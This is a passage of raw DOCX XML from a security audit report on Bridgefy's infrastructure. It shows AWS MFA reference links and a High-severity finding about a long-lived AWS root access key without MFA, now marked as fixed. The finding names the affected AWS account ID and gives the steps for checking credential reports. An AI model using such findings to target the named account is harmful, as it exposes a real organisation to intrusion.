          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>hardware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>or FIDO security keys are recommended. Nevertheless, virtual authenticator applications are also acceptable for these users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>148</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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9"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487622144">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173619</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="92" name="Graphic 92"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="92" name="Graphic 92"/>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3.670801pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15694336;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape74" coordorigin="1440,273" coordsize="2880,0" path="m1440,273l4320,273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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>145</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId221">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.trendmicro.com/cloudoneconformity/knowledge-base/aws/IAM/root-hardware-mfa.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="70"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId222">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/config/latest/developerguide/root-account-hardware-mfa-enabled.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="62"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId223">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/singlesignon/latest/userguide/how-to-configure-mfa(...).html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>148</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId224">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/iam/features/mfa/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250024" w:id="31"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-025</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. Root access keys were removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Bridgefy infrastructure negates the benefits of AWS MFA via an AWS root access key that has been valid for more than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA. In general, AWS root accounts should not be used for daily operations as they are the most privileged accounts in AWS. By creating and frequently using access keys belonging to a root account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leakage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>increases.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Additionally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without an adequate configuration, the API key does not require MFA, thus an attacker who gains access to the root access key can compromise the whole cloud infrastructure. It should be further noted that no documentation was identified relating to credential rotation during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>active,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ago)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Preliminary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>unprivileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>account:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="96" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="39"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId225">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?#/credential_report</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
